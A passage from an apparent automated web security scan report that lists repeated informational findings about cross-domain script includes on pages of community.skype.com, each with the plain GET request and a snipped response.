...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.246. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:36 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.247. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/highlight/true HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.248. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/message-uid/26740/highlight/true  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/message-uid/26740/highlight/true

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/message-uid/26740/highlight/true HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.249. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/td-p/24028  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/td-p/24028

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/td-p/24028 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 122260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.250. http://community.skype.com/t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/130368  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/130368

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/130368 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 202856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.251. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:59 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 186780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.252. http://community.skype.com/t5/errors/error404page  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/errors/error404page

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/errors/error404page HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.253. http://community.skype.com/t5/forums/forumtopicpage.forummessageviewv2.quickreply.form.form.form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicpage.forummessageviewv2.quickreply.form.form.form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicpage.forummessageviewv2.quickreply.form.form.form HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:46:06 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.254. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24028  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24028

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24028 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:45:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.255. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24032  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24032

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24032 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:46:03 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 35984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.256. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/25246  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/25246

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/25246 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:46:03 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.257. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/26740  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/26740

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/26740 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:46:05 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/016526226213F82F99CCE0C6DD68FCB3/lia-scripts-body-min.js"></script>
...[SNIP]...

18.258. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> noptrix.net
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/5766E95FAAD5ECDCE975721AE13E6F34/lia-scripts-body-min.js"></script>
...[SNIP]...

18.259. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2922/print-single-message/true/page/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2922/print-single-message/true/page/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2922/print-single-message/true/page/1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Re: noptrix.
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/5766E95FAAD5ECDCE975721AE13E6F34/lia-scripts-body-min.js"></script>
...[SNIP]...

18.260. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3083/print-single-message/true/page/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/3083/print-single-message/true/page/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/3083/print-single-message/true/page/1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Re: noptrix.
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/5766E95FAAD5ECDCE975721AE13E6F34/lia-scripts-body-min.js"></script>
...[SNIP]...

18.261. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3272/print-single-message/true/page/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/3272/print-single-message/true/page/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/3272/print-single-message/true/page/1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18525

